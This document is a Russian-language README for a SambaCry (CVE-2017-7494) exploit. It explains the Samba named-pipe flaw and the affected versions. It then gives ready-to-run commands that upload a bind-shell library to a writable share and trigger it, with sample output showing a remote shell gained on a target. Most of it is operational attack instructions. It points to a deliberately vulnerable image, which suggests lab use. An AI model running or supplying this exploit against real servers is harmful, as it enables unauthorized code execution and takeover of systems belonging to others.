
SambaCry exploit (CVE-2017-7494)
Samba - это свободная программная реализация сетевого протокола SMB/CIFS. Samba предоставляет файловые и печатные услуги для различных клиентов Microsoft Windows и может интегрироваться с доменом Microsoft Windows Server, либо как контроллер домена (DC), либо как член домена. Начиная с версии 4, он поддерживает Active Directory и домены Microsoft Windows NT.
Samba версии 4.5.9 и более ранние уязвимы для удаленной уязвимости выполнения кода под названием SambaCry. CVE-2017-7494 позволяет удаленным аутентифицированным пользователям загружать общую библиотеку в доступную для записи общую папку и проводить атаки выполнения кода для захвата контроля над серверами, на которых работают уязвимые службы Samba.
Samba 3.x после 3.5.0 и 4.x до 4.4.14, 4.5.x до 4.5.10, и 4.6.x до 4.6.4 не ограничивает путь к файлу при использовании именованных каналов Windows, что позволяет удаленным аутентифицированным пользователям загружать общую библиотеку в доступную для записи общую папку и выполнять произвольный код через специально созданный именованный канал.
Используйте poetry для настройки окружения для этого эксплойта
pip3 install -r requirements.txt
После этого вы можете запустить его следующим образом:
./exploit -t <target> -e libbindshell-samba.so \
-s <share> -r <location>/libbindshell-samba.so \
-u <user> -p <password> -P 6699
Например, если вы используете уязвимый образ из vulnerables/cve-2017-7494 и хотите запустить этот эксплойт против него:
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
И вы получите следующий вывод
./exploit -t <target> -e libbindshell-samba.so \
-s data -r /data/libbindshell-samba.so \
-u sambacry -p nosambanocry -P 6699
[*] Starting the exploit
[+] Authentication ok, we are in !
[+] Preparing the exploit
[+] Exploit trigger running in background, checking our shell
[+] Connecting to 10.1.1.5 at 6699
[+] Veryfying your shell...
Linux 7a4b8023575a 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u1 (2017-02-22) x86_64 GNU/Linux
>>
Полезная нагрузка для этого проекта, а также код были в значительной степени вдохновлены opsxcq/exploit-CVE-2017-7494.